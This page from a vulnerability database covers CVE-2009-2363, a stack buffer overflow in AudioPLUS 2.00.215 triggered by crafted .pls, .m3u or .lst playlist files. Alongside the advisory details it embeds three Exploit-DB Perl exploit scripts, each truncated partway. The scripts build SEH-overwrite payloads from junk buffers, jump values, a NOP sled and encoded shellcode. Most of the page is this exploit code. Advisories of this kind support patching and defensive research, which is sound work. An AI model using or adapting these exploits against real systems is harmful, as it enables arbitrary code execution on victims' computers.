CVE-2009-2363
published 2009-07-08CVE-2009-2363: Stack-based buffer overflow in KUDRSOFT AudioPLUS 2.00.215 allows remote attackers to execute arbitrary code via a .pls playlist file with a playlist entry…
PriorityP348critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.10%
92.5th percentile
Stack-based buffer overflow in KUDRSOFT AudioPLUS 2.00.215 allows remote attackers to execute arbitrary code via a .pls playlist file with a playlist entry containing a long File1 argument.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yukudr | audioplus | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AudioPLUS 2.00.215 - '.m3u' / '.lst' Universal Overwrite (SEH)
exploitdb·2009-07-15
CVE-2009-2363 AudioPLUS 2.00.215 - '.m3u' / '.lst' Universal Overwrite (SEH)
AudioPLUS 2.00.215 - '.m3u' / '.lst' Universal Overwrite (SEH)
---
#!/usr/bin/perl
# AudioPLUS 2.00.215 (.m3u .lst ) Universal Seh Overwrite Exploit
# first exploiter hack4love http://www.milw0rm.com/exploits/9064
# and this the universal for .lst .m3u extention
# Big Thnx to his0ka my best freind :d
# Stack
print "AudioPLUS 2.00.215 (.m3u .lst ) Universal Seh Overwrite Exploit\n";
my $shellcode=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\
Exploit-DB
AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)
exploitdb·2009-07-01
CVE-2009-2363 AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)
AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# AudioPLUS 2.00.215 (.m3u / .lst File) Local buffer Overflow (seh)
# # Greetz to all my friends
# form egypt
## easy :d
## Tested on: Windows XP Pro SP2 (EN)
################################################################
my $bof="\x41" x 4116;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xb8\x15\xd1\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"
Exploit-DB
AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)
exploitdb·2009-07-01
CVE-2009-2363 AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)
AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# AudioPLUS 2.00.215 (.pls) Local buffer Overflow (seh)
print "AudioPLUS 2.00.215 (.pls) Local buffer Overflow (seh)\n";
my $header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://";
my $junk="\x41" x 4103;
my $nseh="\xEB\x06\x90\x90";
my $seh="\x35\x2F\xD1\x72"; # jmp msacm32.drv ebx
my $nop="\x90" x 20;
my $shellcode=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48
No writeups or analysis indexed.
http://packetstormsecurity.org/0907-exploits/audiopluspls-overflow.txthttp://www.exploit-db.com/exploits/9070https://exchange.xforce.ibmcloud.com/vulnerabilities/51485http://packetstormsecurity.org/0907-exploits/audiopluspls-overflow.txthttp://www.exploit-db.com/exploits/9070https://exchange.xforce.ibmcloud.com/vulnerabilities/51485
2009-07-08
Published